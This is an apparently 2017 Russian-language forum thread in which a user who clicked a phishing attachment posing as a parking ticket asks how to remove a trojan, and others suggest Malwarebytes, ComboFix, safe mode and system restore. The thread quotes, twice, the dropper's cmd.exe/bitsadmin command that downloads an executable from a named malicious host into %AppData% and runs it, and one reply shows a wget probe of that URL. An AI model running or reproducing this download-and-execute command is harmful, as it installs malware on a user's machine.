троян вирус?

[kyk]

В мыле, замаскированный как якобы parking ticket, пришёл attachment c таким вот линком внутри.
Вроде бы я кликнул.

C:\Windows\System32\cmd.exe /c bitsadmin.exe /transfer j /priority high http://ryp.preethimohan.in/duto/hero.bin %AppData%\34.exe & %AppData%\34.exe

[Uzito]

Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.

[kyk]

Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.

как лечить?

[thinker]

Try: Malwarebytes

[Uzito]

Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.

как лечить?

А это зависит от того, что экзешник сделал.
В самом простом случае, сделать system restore или если просто добавилось в авторан и запускается каждый раз, перегрузиться в safe mode, вычистить экзешник из %AppData%. А если оно слишком зловредное и убило все откаты, то только формат си - хер знает что оно там могло сделать, особенно если Вы под админом гуляете.

[Slonjra]

Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.

как лечить?

из бесплатных - вот эта пара

https://www.bleepingcomputer.com/download/combofix/

https://www.malwarebytes.com/ (бесплатную версию)

прогонять лучше в Safe mode.

[AndreyT]

В мыле, замаскированный как якобы parking ticket, пришёл attachment c таким вот линком внутри.
Вроде бы я кликнул.

C:\Windows\System32\cmd.exe /c bitsadmin.exe /transfer j /priority high http://ryp.preethimohan.in/duto/hero.bin %AppData%\34.exe & %AppData%\34.exe

Кликнул на что именно? Т.е. вы видели собственными глазами, что запускался cmd.exe?

[kyk]

вычистить экзешник из %AppData%.

Иду в фолдер %AppData% и никаких экзешников не вижу

Hidden/system file view - enabled (Win-7-64)

[Uzito]

вычистить экзешник из %AppData%.

Иду в фолдер %AppData% и никаких экзешников не вижу
Hidden/system file view - enabled (Win-7-64)

Ну тут вариантов три
1) У вас установился руткит, который прячет свое эезешник от посторонних глаз.
2) Оно после запуска заховалось куда-то глубже.
3) Оно не смогло скачаться/запуститься и проблемы нет.

Сказать что случилось на самом деле я не берусь. На всякий случай все же сделайте system restore на предыдущую сохраненку и прогоните порекомендованые combofix и malwarebytes.

[kyk]

прогнал Malwarebytes, MSE антивирус и MS "Windows Malicious Software Removal Tool (MSRT) July 2017" aka KB890830.

Ничего не нашлось

[Uzito]

прогнал Malwarebytes, MSE антивирус и MS "Windows Malicious Software Removal Tool (MSRT) July 2017" aka KB890830.
Ничего не нашлось

Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.

Code: Select all

H:\junk\wget>wget.exe http://ryp.preethimohan.in/duto/hero.bin
--2017-07-18 18:26:41--  http://ryp.preethimohan.in/duto/hero.bin
Resolving ryp.preethimohan.in... 31.28.1.141
Connecting to ryp.preethimohan.in|31.28.1.141|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2017-07-18 18:26:41 ERROR 403: Forbidden.

[blanko27]

Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.

Ну вот, человек писал, старался, а его троян забанили...

[AndreyT]

Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.

Ну вот, человек писал, старался, а его троян забанили...

Ничего вы не поняли. Человек хотел заDDoSить уютный сайтик ненавистного конкурента. Хитро запостил сюда ссылку. Все сразу ломанулись скачивать, думая что это бесплатная раздача вирусов. В результате сайтик успешно заDDoSился...

[blanko27]

В результате сайтик успешно заDDoSился...

Ах да, это хитроумная идея